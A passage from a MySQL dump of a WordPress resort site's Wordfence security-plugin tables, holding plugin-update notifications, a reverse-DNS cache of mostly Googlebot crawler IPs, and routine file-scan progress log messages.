scan</a>','[]'),('site-OEDAAAA',0,'wfplugin_updates',502,1563152445,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QADAAAA',0,'wfplugin_updates',502,1563724104,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QUDAAAA',0,'wfplugin_updates',502,1564330834,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-RQDAAAA',0,'wfplugin_updates',502,1564773528,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-SEDAAAA',0,'wfplugin_updates',502,1566521142,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-UIDAAAA',0,'wfplugin_updates',502,1567277195,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-U4DAAAA',0,'wfplugin_updates',502,1569976007,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-YADAAAA',0,'wfplugin_updates',502,1571498613,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-ZEDAAAA',0,'wfplugin_updates',502,1572547544,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-2QDAAAA',0,'wfplugin_updates',502,1574861994,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-5EDAAAA',0,'wfplugin_updates',502,1579548380,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AYDQAAA',0,'wfplugin_updates',502,1580430950,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-B4DQAAA',0,'wfplugin_updates',502,1584580768,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-GADQAAA',0,'wfplugin_updates',502,1587823684,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-K4DQAAA',0,'wfplugin_updates',502,1589139364,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-MUDQAAA',0,'wfplugin_updates',502,1591056280,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-OYDQAAA',0,'wfplugin_updates',502,1592669104,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-PUDQAAA',0,'wfplugin_updates',502,1593651807,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-P4DQAAA',1,'wfplugin_scan',502,1604081982,'<a href=\"https://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-RIDQAAA',0,'wfplugin_updates',502,1596676940,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-S4DQAAA',0,'wfplugin_updates',502,1598819987,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">Updates are available for 3 themes</a>','[]'),('site-WQDQAAA',0,'wfplugin_updates',502,1602338262,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-Z4DQAAA',1,'wfplugin_updates',502,1604081982,'<a href=\"https://ashbyresort.com/wp-admin/update-core.php\">An update is available for WordPress (v5.5.2)</a>','[]');
/*!40000 ALTER TABLE `ar_wfNotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfPendingIssues`
--

DROP TABLE IF EXISTS `ar_wfPendingIssues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfPendingIssues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfPendingIssues`
--

LOCK TABLES `ar_wfPendingIssues` WRITE;
/*!40000 ALTER TABLE `ar_wfPendingIssues` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfPendingIssues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfReverseCache`
--

DROP TABLE IF EXISTS `ar_wfReverseCache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfReverseCache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfReverseCache`
--

LOCK TABLES `ar_wfReverseCache` WRITE;
/*!40000 ALTER TABLE `ar_wfReverseCache` DISABLE KEYS */;
INSERT INTO `ar_wfReverseCache` VALUES ('\0\0\0\0\0\0\0\0\0\0BF@','crawl-66-249-70-64.googlebot.com',1605285662),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-164.googlebot.com',1604904484),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-176.googlebot.com',1605385327),('\0\0\0\0\0\0\0\0\0\0BB0','crawl-66-249-66-48.googlebot.com',1604233601),('\0\0\0\0\0\0\0\0\0\0BB.','crawl-66-249-66-46.googlebot.com',1604149025),('\0\0\0\0\0\0\0\0\0\0BB*','crawl-66-249-66-42.googlebot.com',1604046230),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-140.googlebot.com',1603990800),('\0\0\0\0\0\0\0\0\0\0B\\V','rate-limited-proxy-66-249-92-86.google.com',1603778047),('\0\0\0\0\0\0\0\0\0\0B\\P','rate-limited-proxy-66-249-92-80.google.com',1603144685),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-168.googlebot.com',1604357471),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-7.googlebot.com',1602783451),('\0\0\0\0\0\0\0\0\0\0BO','crawl-66-249-79-132.googlebot.com',1602692943),('\0\0\0\0\0\0\0\0\0\0BY','rate-limited-proxy-66-249-89-15.google.com',1605046322),('\0\0\0\0\0\0\0\0\0\0BY','rate-limited-proxy-66-249-89-23.google.com',1605046320),('\0\0\0\0\0\0\0\0\0\0BF&','crawl-66-249-70-38.googlebot.com',1602012764),('\0\0\0\0\0\0\0\0\0\0BF2','crawl-66-249-70-50.googlebot.com',1601995306),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-216.googlebot.com',1601995304),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-218.googlebot.com',1601995303),('\0\0\0\0\0\0\0\0\0\0BBU','crawl-66-249-66-85.googlebot.com',1601924035),('\0\0\0\0\0\0\0\0\0\0B\\R','rate-limited-proxy-66-249-92-82.google.com',1603144687),('\0\0\0\0\0\0\0\0\0\0B\\N','rate-limited-proxy-66-249-92-78.google.com',1603778045),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-144.googlebot.com',1604192505),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-144.googlebot.com',1601735025),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-20.googlebot.com',1601695840),('\0\0\0\0\0\0\0\0\0\0BY&','rate-limited-proxy-66-249-89-38.google.com',1601215974),('\0\0\0\0\0\0\0\0\0\0#o','35.187.132.111',1601038723),('\0\0\0\0\0\0\0\0\0\0#d','35.187.132.100',1601038718),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-142.googlebot.com',1603786434),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-148.googlebot.com',1604171312),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-146.googlebot.com',1604171505),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-150.googlebot.com',1604134656),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-154.googlebot.com',1600827516),('\0\0\0\0\0\0\0\0\0\0BBV','crawl-66-249-66-86.googlebot.com',1601924293),('\0\0\0\0\0\0\0\0\0\0BBT','crawl-66-249-66-84.googlebot.com',1604538507),('\0\0\0\0\0\0\0\0\0\0BY%','rate-limited-proxy-66-249-89-37.google.com',1600593219),('\0\0\0\0\0\0\0\0\0\06&Z','ec2-54-167-38-90.compute-1.amazonaws.com',1600478502),('\0\0\0\0\0\0\0\0\0\0BY\r','rate-limited-proxy-66-249-89-13.google.com',1604413120),('\0\0\0\0\0\0\0\0\0\0BY','rate-limited-proxy-66-249-89-25.google.com',1604413110),('\0\0\0\0\0\0\0\0\0\09','178.57.18.1',1599951497),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-180.googlebot.com',1605176641),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-178.googlebot.com',1605069589),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-170.googlebot.com',1603248055),('\0\0\0\0\0\0\0\0\0\0BDV','crawl-66-249-68-86.googlebot.com',1599721402),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-154.googlebot.com',1605012328),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-25.googlebot.com',1604970407),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-150.googlebot.com',1605045346),('\0\0\0\0\0\0\0\0\0\0B@\r','crawl-66-249-64-13.googlebot.com',1604970415),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-182.googlebot.com',1604357470),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-22.googlebot.com',1602049470),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-23.googlebot.com',1604970413),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-4.googlebot.com',1603473139),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-6.googlebot.com',1603473144),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-166.googlebot.com',1605176642),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-152.googlebot.com',1605016092),('\0\0\0\0\0\0\0\0\0\0BB4','crawl-66-249-66-52.googlebot.com',1604569610),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-157.googlebot.com',1599476710),('\0\0\0\0\0\0\0\0\0\0B\\J','rate-limited-proxy-66-249-92-74.google.com',1599344741),('\0\0\0\0\0\0\0\0\0\0B\\B','rate-limited-proxy-66-249-92-66.google.com',1599344736),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-132.googlebot.com',1600705387),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-130.googlebot.com',1600679446),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-134.googlebot.com',1603997760),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-138.googlebot.com',1600683192),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-136.googlebot.com',1603817007),('\0\0\0\0\0\0\0\0\0\0BB(','crawl-66-249-66-40.googlebot.com',1603696581),('\0\0\0\0\0\0\0\0\0\0B\\','rate-limited-proxy-66-249-92-208.google.com',1598728214),('\0\0\0\0\0\0\0\0\0\0B\\','rate-limited-proxy-66-249-92-198.google.com',1598728189),('\0\0\0\0\0\0\0\0\0\0BBX','crawl-66-249-66-88.googlebot.com',1604601305),('\0\0\0\0\0\0\0\0\0\0BY(','rate-limited-proxy-66-249-89-40.google.com',1598085223),('\0\0\0\0\0\0\0\0\0\0BF\n','crawl-66-249-70-10.googlebot.com',1603480210),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-29.googlebot.com',1598293130),('\0\0\0\0\0\0\0\0\0\0BB2','crawl-66-249-66-50.googlebot.com',1604613127),('\0\0\0\0\0\0\0\0\0\0BB6','crawl-66-249-66-54.googlebot.com',1603851582),('\0\0\0\0\0\0\0\0\0\0BB&','crawl-66-249-66-38.googlebot.com',1604569611),('\0\0\0\0\0\0\0\0\0\0BBZ','crawl-66-249-66-90.googlebot.com',1604601300),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-200.googlebot.com',1599233336),('\0\0\0\0\0\0\0\0\0\0k0','48.194.178.107.gae.googleusercontent.com',1597030715),('\0\0\0\0\0\0\0\0\0\0k-','45.194.178.107.gae.googleusercontent.com',1597030716),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-195.googlebot.com',1598601363),('\0\0\0\0\0\0\0\0\0\0B\\','rate-limited-proxy-66-249-92-210.google.com',1597479625),('\0\0\0\0\0\0\0\0\0\0B\\','rate-limited-proxy-66-249-92-200.google.com',1597479623),('\0\0\0\0\0\0\0\0\0\0BBY','crawl-66-249-66-89.googlebot.com',1604560392),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-198.googlebot.com',1598601532),('\0\0\0\0\0\0\0\0\0\0BBF','crawl-66-249-66-70.googlebot.com',1604173875),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-8.googlebot.com',1603480213),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-24.googlebot.com',1605230756),('\0\0\0\0\0\0\0\0\0\0BA','crawl-66-249-65-172.googlebot.com',1596641167),('\0\0\0\0\0\0\0\0\0\0BA]','crawl-66-249-65-93.googlebot.com',1596641062),('\0\0\0\0\0\0\0\0\0\0BA[','crawl-66-249-65-91.googlebot.com',1596635142),('\0\0\0\0\0\0\0\0\0\0BAZ','crawl-66-249-65-90.googlebot.com',1596635141),('\0\0\0\0\0\0\0\0\0\0BA\\','crawl-66-249-65-92.googlebot.com',1596635139),('\0\0\0\0\0\0\0\0\0\0BA','crawl-66-249-65-176.googlebot.com',1596607734),('\0\0\0\0\0\0\0\0\0\0BA','crawl-66-249-65-174.googlebot.com',1596607717),('\0\0\0\0\0\0\0\0\0\0BF.','crawl-66-249-70-46.googlebot.com',1601997176),('\0\0\0\0\0\0\0\0\0\0BF0','crawl-66-249-70-48.googlebot.com',1596576409),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-128.googlebot.com',1602783448),('\0\0\0\0\0\0\0\0\0\0BBD','crawl-66-249-66-68.googlebot.com',1604296617),('\0\0\0\0\0\0\0\0\0\0BB]','crawl-66-249-66-93.googlebot.com',1596342727),('\0\0\0\0\0\0\0\0\0\0BB^','crawl-66-249-66-94.googlebot.com',1596370973),('\0\0\0\0\0\0\0\0\0\0BB\\','crawl-66-249-66-92.googlebot.com',1596342725),('\0\0\0\0\0\0\0\0\0\0BBB','crawl-66-249-66-66.googlebot.com',1604290060),('\0\0\0\0\0\0\0\0\0\09','185.57.29.186',1596280360),('\0\0\0\0\0\0\0\0\0\0BB@','crawl-66-249-66-64.googlebot.com',1596342724),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-210.googlebot.com',1599254035),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-204.googlebot.com',1596351800),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-206.googlebot.com',1604234531),('\0\0\0\0\0\0\0\0\0\0BB','crawl-66-249-66-208.googlebot.com',1599188488),('\0\0\0\0\0\0\0\0\0\0b\"(','98.34.40.146',1593923092),('\0\0\0\0\0\0\0\0\0\0OL','swe-net-ip.as51430.net',1593870280),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-30.googlebot.com',1595459246),('\0\0\0\0\0\0\0\0\0\0BY2','rate-limited-proxy-66-249-89-50.google.com',1601215976),('\0\0\0\0\0\0\0\0\0\0E','69.165.31.165',1598357864),('\0\0\0\0\0\0\0\0\0\0/ˉ','47.203.137.20',1604081840),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-18.googlebot.com',1603479777),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-22.googlebot.com',1602116621),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-16.googlebot.com',1596723630),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-24.googlebot.com',1596500991),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-28.googlebot.com',1596500990),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-27.googlebot.com',1602073782),('\0\0\0\0\0\0\0\0\0\0e','141.101.143.22',1593350884),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-12.googlebot.com',1598293132),('\0\0\0\0\0\0\0\0\0\0BF\Z','crawl-66-249-70-26.googlebot.com',1596500988),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-16.googlebot.com',1603471977),('\0\0\0\0\0\0\0\0\0\0B@\Z','crawl-66-249-64-26.googlebot.com',1596710486),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-14.googlebot.com',1604972565),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-15.googlebot.com',1605012329),('\0\0\0\0\0\0\0\0\0\0BY0','rate-limited-proxy-66-249-89-48.google.com',1598085224),('\0\0\0\0\0\0\0\0\0\0B@','crawl-66-249-64-28.googlebot.com',1603501815),('\0\0\0\0\0\0\0\0\0\0BF','crawl-66-249-70-14.googlebot.com',1603473146),('\0\0\0\0\0\0\0\0\0\0BY,','rate-limited-proxy-66-249-89-44.google.com',1596255822),('\0\0\0\0\0\0\0\0\0\0BY.','rate-limited-proxy-66-249-89-46.google.com',1600593223);
/*!40000 ALTER TABLE `ar_wfReverseCache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfSNIPCache`
--

DROP TABLE IF EXISTS `ar_wfSNIPCache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfSNIPCache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfSNIPCache`
--

LOCK TABLES `ar_wfSNIPCache` WRITE;
/*!40000 ALTER TABLE `ar_wfSNIPCache` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfSNIPCache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfStatus`
--

DROP TABLE IF EXISTS `ar_wfStatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfStatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=30501 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfStatus`
--

LOCK TABLES `ar_wfStatus` WRITE;
/*!40000 ALTER TABLE `ar_wfStatus` DISABLE KEYS */;
INSERT INTO `ar_wfStatus` VALUES (29709,1556175079.744300,2,'info','Analyzed 2600 files containing 54.4 MB of data so far'),(29708,1556175079.250513,2,'info','Analyzed 2500 files containing 53.52 MB of data so far'),(29707,1556175078.286886,2,'info','Analyzed 2400 files containing 48.72 MB of data so far'),(29981,1556440019.741685,2,'info','Analyzed 7900 files containing 141.35 MB of data so far'),(29980,1556440019.075898,2,'info','Analyzed 7800 files containing 139.04 MB of data so far'),(29652,1556175057.890485,2,'info','Getting plugin list from WordPress'),(29653,1556175057.892837,2,'info','Found 21 plugins'),(30025,1556440047.182453,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),(29318,1555656784.797247,2,'info','Scanned contents of 344 additional files at 11.66 per second'),(29317,1555656783.511981,2,'info','Scanned contents of 339 additional files at 12.02 per second'),(29319,1555656785.804889,2,'info','Scanned contents of 360 additional files at 11.80 per second'),(29320,1555656786.901629,2,'info','Scanned contents of 383 additional files at 12.12 per second'),(29963,1556440008.075368,2,'info','Analyzed 6100 files containing 109.46 MB of data so far'),(29082,1555397971.934982,2,'info','Scanned contents of 70 additional files at 12.34 per second'),(29081,1555397968.609600,2,'info','Scanned contents of 66 additional files at 28.14 per second'),(29799,1556175131.335628,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29800,1556175131.638944,2,'info','Done host key check.'),(30055,1556592797.059661,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(29547,1555916729.877264,2,'info','Analyzed 8100 files containing 146.53 MB of data so far'),(29548,1555916729.905717,2,'info','Analyzed 8113 files containing 146.8 MB of data.'),(29741,1556175098.792933,2,'info','Analyzed 5800 files containing 107.75 MB of data so far'),(29740,1556175097.822299,2,'info','Analyzed 5700 files containing 102.57 MB of data so far'),(29739,1556175096.896396,2,'info','Analyzed 5600 files containing 98.43 MB of data so far'),(29738,1556175096.622883,2,'info','Analyzed 5500 files containing 97.72 MB of data so far'),(29275,1555656745.212198,2,'info','Analyzed 6900 files containing 115.31 MB of data so far'),(29269,1555656743.343802,2,'info','Analyzed 6300 files containing 108.48 MB of data so far'),(29270,1555656743.858532,2,'info','Analyzed 6400 files containing 110.95 MB of data so far'),(29271,1555656744.381413,2,'info','Analyzed 6500 files containing 113.36 MB of data so far'),(29272,1555656744.757477,2,'info','Analyzed 6600 files containing 114.94 MB of data so far'),(29273,1555656744.899669,2,'info','Analyzed 6700 files containing 115.13 MB of data so far'),(29274,1555656745.026719,2,'info','Analyzed 6800 files containing 115.15 MB of data so far'),(29118,1555397993.495147,2,'info','Done examining URLs'),(29527,1555916719.038755,2,'info','Analyzed 6100 files containing 109.46 MB of data so far'),(29528,1555916719.580373,2,'info','Analyzed 6200 files containing 112.18 MB of data so far'),(29529,1555916719.976297,2,'info','Analyzed 6300 files containing 114.08 MB of data so far'),(30248,1556693683.485105,2,'info','Starting password strength check on 2 users.'),(29910,1556439979.046808,2,'info','Analyzed 800 files containing 14.37 MB of data so far'),(29225,1555656722.309168,2,'info','Analyzed 1900 files containing 41.82 MB of data so far'),(29226,1555656722.513617,2,'info','Analyzed 2000 files containing 42.33 MB of data so far'),(30222,1556693669.563673,2,'info','Scanned contents of 179 additional files at 19.01 per second'),(29331,1555656801.759047,2,'info','Scanned contents of 543 additional files at 11.69 per second'),(29488,1555916699.856596,2,'info','Analyzed 2200 files containing 46.58 MB of data so far'),(29489,1555916700.114257,2,'info','Analyzed 2300 files containing 47.53 MB of data so far'),(29490,1555916700.406558,2,'info','Analyzed 2400 files containing 48.72 MB of data so far'),(30031,1556440055.585728,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(29865,1556439963.845938,2,'info','The disk has 148823.07 MB available'),(29392,1555723124.663054,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30260,1556693688.742450,1,'info','Scan Complete. Scanned 8113 files, 21 plugins, 8 themes, 21 posts, 0 comments and 687 URLs in 2 minutes 3 seconds.'),(30252,1556693688.693728,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(29487,1555916699.177376,2,'info','Analyzed 2100 files containing 43.52 MB of data so far'),(29486,1555916698.879461,2,'info','Analyzed 2000 files containing 42.33 MB of data so far'),(30078,1556693575.437864,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(30079,1556693575.450047,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(29497,1555916704.160348,2,'info','Analyzed 3100 files containing 61.65 MB of data so far'),(29498,1555916704.487530,2,'info','Analyzed 3200 files containing 62.33 MB of data so far'),(29499,1555916704.929297,2,'info','Analyzed 3300 files containing 64.02 MB of data so far'),(29500,1555916705.395384,2,'info','Analyzed 3400 files containing 65.34 MB of data so far'),(29501,1555916706.171055,2,'info','Analyzed 3500 files containing 67.68 MB of data so far'),(29502,1555916710.986177,2,'info','Analyzed 3600 files containing 80.66 MB of data so far'),(29411,1555896206.060623,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29412,1555896206.060870,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29928,1556439988.207436,2,'info','Analyzed 2600 files containing 54.4 MB of data so far'),(30122,1556693600.812404,2,'info','8000 files indexed'),(29696,1556175072.781879,2,'info','Analyzed 1300 files containing 28.93 MB of data so far'),(30040,1556440055.611822,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(30038,1556440055.611148,2,'info','Wordfence used 27.89 MB of memory for scan. Server peak memory usage was: 85.89 MB'),(30039,1556440055.611550,1,'info','Scan Complete. Scanned 8113 files, 21 plugins, 8 themes, 21 posts, 0 comments and 687 URLs in 1 minute 39 seconds.'),(29871,1556439963.876607,2,'info','Getting plugin list from WordPress'),(29701,1556175076.223669,2,'info','Analyzed 1800 files containing 40.45 MB of data so far'),(29700,1556175075.989968,2,'info','Analyzed 1700 files containing 39.82 MB of data so far'),(29699,1556175075.760333,2,'info','Analyzed 1600 files containing 39.37 MB of data so far'),(29698,1556175074.821338,2,'info','Analyzed 1500 files containing 35.08 MB of data so far'),(29697,1556175073.905146,2,'info','Analyzed 1400 files containing 31.02 MB of data so far'),(29242,1555656734.900614,2,'info','Analyzed 3600 files containing 80.66 MB of data so far'),(29243,1555656735.215972,2,'info','Analyzed 3700 files containing 81.39 MB of data so far'),(29244,1555656735.429693,2,'info','Analyzed 3800 files containing 81.59 MB of data so far'),(29476,1555916693.563680,2,'info','Analyzed 1000 files containing 17.99 MB of data so far'),(29912,1556439979.673714,2,'info','Analyzed 1000 files containing 17.99 MB of data so far'),(29913,1556439980.273857,2,'info','Analyzed 1100 files containing 20.74 MB of data so far'),(29914,1556439981.666204,2,'info','Analyzed 1200 files containing 27.48 MB of data so far'),(29915,1556439982.003042,2,'info','Analyzed 1300 files containing 28.93 MB of data so far'),(29916,1556439982.488906,2,'info','Analyzed 1400 files containing 31.02 MB of data so far'),(29249,1555656736.615937,2,'info','Analyzed 4300 files containing 83.46 MB of data so far'),(29561,1555916736.575403,2,'info','Scanned contents of 122 additional files at 22.37 per second'),(29827,1556241606.384540,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29826,1556241606.383558,1,'info','-------------------'),(29435,1555916682.160634,2,'info','Getting plugin list from WordPress'),(29436,1555916682.162651,2,'info','Found 21 plugins'),(29437,1555916682.162997,2,'info','Getting theme list from WordPress'),(30007,1556440045.883433,2,'info','Scanned contents of 262 additional files at 11.13 per second'),(29326,1555656796.599926,2,'info','Scanned contents of 465 additional files at 11.26 per second'),(29327,1555656797.641244,2,'info','Scanned contents of 479 additional files at 11.31 per second'),(29798,1556175131.334911,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(29142,1555550594.175884,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29140,1555550594.174463,1,'info','-------------------'),(29141,1555550594.175385,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(30059,1556592797.082836,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30056,1556592797.076922,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30057,1556592797.081376,1,'info','-------------------'),(30058,1556592797.082458,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29982,1556440020.372388,2,'info','Analyzed 8000 files containing 144.59 MB of data so far'),(29748,1556175101.453474,2,'info','Analyzed 6500 files containing 117.72 MB of data so far'),(29747,1556175100.828045,2,'info','Analyzed 6400 files containing 115.47 MB of data so far'),(29746,1556175100.505751,2,'info','Analyzed 6300 files containing 114.08 MB of data so far'),(29745,1556175100.068613,2,'info','Analyzed 6200 files containing 112.18 MB of data so far'),(29744,1556175099.458309,2,'info','Analyzed 6100 files containing 109.46 MB of data so far'),(29743,1556175099.192886,2,'info','Analyzed 6000 files containing 108.97 MB of data so far'),(29962,1556440007.746891,2,'info','Analyzed 6000 files containing 108.97 MB of data so far'),(29961,1556440007.468650,2,'info','Analyzed 5900 files containing 108.4 MB of data so far'),(29948,1556440001.790822,2,'info','Analyzed 4600 files containing 85.39 MB of data so far'),(29949,1556440002.293709,2,'info','Analyzed 4700 files containing 87.35 MB of data so far'),(29950,1556440003.186819,2,'info','Analyzed 4800 files containing 92.64 MB of data so far'),(29951,1556440003.401661,2,'info','Analyzed 4900 files containing 93.95 MB of data so 